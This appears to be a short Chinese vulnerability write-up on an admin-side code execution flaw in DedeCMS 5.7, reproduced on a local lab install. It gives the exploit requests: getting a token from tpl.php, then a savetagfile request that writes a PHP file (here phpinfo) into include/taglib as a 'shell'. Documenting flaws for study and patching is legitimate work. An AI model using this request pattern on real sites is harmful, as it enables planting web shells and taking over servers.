织梦cms5.7 后台存在代码执行漏洞

漏洞利用:
在本地搭建织梦cms,默认的后台地址为 域名/dede
因为后续的利用需要使用到token,然而登录成功后的数据包内并没有显示token值。所以需要访问如下链接获取token:
http://192.168.137.131/dede/tpl.php?action=upload
访问后查看页面源代码,获取到token
织梦cms5.7 后台存在代码执行漏洞_第1张图片
然后访问:
http://192.168.137.131/dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=fc3851c93ca2fcf62bc099debd75edb2
写入代码成功,shell地址:
http://192.168.137.131/include/taglib/moonsec.lib.php
织梦cms5.7 后台存在代码执行漏洞_第2张图片

你可能感兴趣的:(织梦cms5.7 后台存在代码执行漏洞)